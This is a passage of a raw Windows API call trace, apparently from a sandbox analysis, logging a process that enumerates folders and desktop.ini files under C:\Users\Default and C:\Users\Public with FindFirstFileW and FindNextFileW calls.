ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.796] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.796] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.796] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.796] lstrlenW (lpString="desktop.ini") returned 11 [0184.796] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.797] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.797] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0184.797] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.797] lstrlenW (lpString="PrintHood") returned 9 [0184.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x6ec488, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0184.797] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.797] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0184.797] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.797] lstrlenW (lpString="Recent") returned 6 [0184.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x6ec488, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0184.797] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.797] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0184.797] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.797] lstrlenW (lpString="Saved Games") returned 11 [0184.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.798] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.798] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.798] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.798] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.798] lstrlenW (lpString="desktop.ini") returned 11 [0184.798] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.798] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.798] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0184.798] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.798] lstrlenW (lpString="Searches") returned 8 [0184.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.820] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.820] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.820] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.820] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.820] lstrlenW (lpString="desktop.ini") returned 11 [0184.820] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.821] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.821] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0184.821] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.821] lstrlenW (lpString="SendTo") returned 6 [0184.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x704750, ftCreationTime.dwLowDateTime=0x6ec548, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.822] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.822] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0184.822] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.822] lstrlenW (lpString="Start Menu") returned 10 [0184.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x704750, ftCreationTime.dwLowDateTime=0x6ec548, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.822] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.822] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0184.822] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.822] lstrlenW (lpString="Templates") returned 9 [0184.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x704750, ftCreationTime.dwLowDateTime=0x6ec548, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.823] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.823] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0184.823] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.823] lstrlenW (lpString="Videos") returned 6 [0184.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.823] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.823] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.823] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.823] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.823] lstrlenW (lpString="desktop.ini") returned 11 [0184.824] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.824] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.824] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0184.824] FindClose (in: hFindFile=0x6ebce0 | out: hFindFile=0x6ebce0) returned 1 [0184.824] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee5c8 | out: hHeap=0x6b0000) returned 1 [0184.824] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5c003f, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0184.824] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.824] lstrlenW (lpString="Default User") returned 12 [0184.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x6e7ae0, ftCreationTime.dwLowDateTime=0x6ec548, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff [0184.824] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee5c8 | out: hHeap=0x6b0000) returned 1 [0184.824] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x5c003f, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.824] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.824] lstrlenW (lpString="desktop.ini") returned 11 [0184.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebce0 [0184.825] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.825] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.825] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0184.825] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.825] lstrlenW (lpString="Desktop") returned 7 [0184.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.825] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.825] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.825] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0184.825] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.825] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0184.825] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.826] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.826] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.826] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.826] lstrlenW (lpString="desktop.ini") returned 11 [0184.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.826] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.826] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.826] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, 